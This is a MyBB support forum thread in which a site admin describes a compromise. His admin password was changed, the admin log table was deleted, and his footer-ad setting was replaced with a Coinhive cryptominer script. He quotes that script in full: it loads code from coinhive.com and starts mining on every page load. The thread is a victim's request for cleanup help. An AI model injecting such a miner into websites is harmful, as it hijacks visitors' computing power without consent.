MyBB Community Forums

Hi guys,

Whilst I was on vacation, several memebers reported high CPU usage on my forum and that the script "Coinhive" was attempting to run (flagged by AV systems), details here: https://www.berlingoforum.com/thread-16174.html

My admin password appeared to be changed but I have since recovered. The administrator logs don't appear to be working 

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
1146 - Table 'berlingo1_dbnew.mybb_adminlog' doesn't exist
Query:
SELECT COUNT(l.dateline) AS count FROM mybb_adminlog l LEFT JOIN mybb_users u ON (u.uid=l.uid) WHERE 1=1

Could anyone assist with this, as I can't see any new plugins installed that might be causing the issue.

---

To update on this, i had this in my settings.php file:

$settings['footad'] = "

<script src=\"https://coinhive.com/lib/coinhive.min.js\"></script>

<script>

	var miner = new CoinHive.User('XdVLWD3FZXqUXyoedFpqNUsgukVXBuVo', 'www.adabolsas.com.br');

	miner.start();

</script>";

Any tips for full removal?

---

So to finally update here:

- My administrator log table appears to have been removed
- Someone changed my footer advertisement code to the snippet of code above which was triggering the CoinHive miner to start on each page load.
- The plugin i'm using for the footer ads is "My Ads Manager"

I'm not sure if this was a weakness in the plugin, or someone gained access to the administrator account.

Though the administrator logs are gone, I assume you still have server access logs? This might help work out if the attacker had full ACP access (and if so, what actions they took whilst in there) and might help work out how they got that access.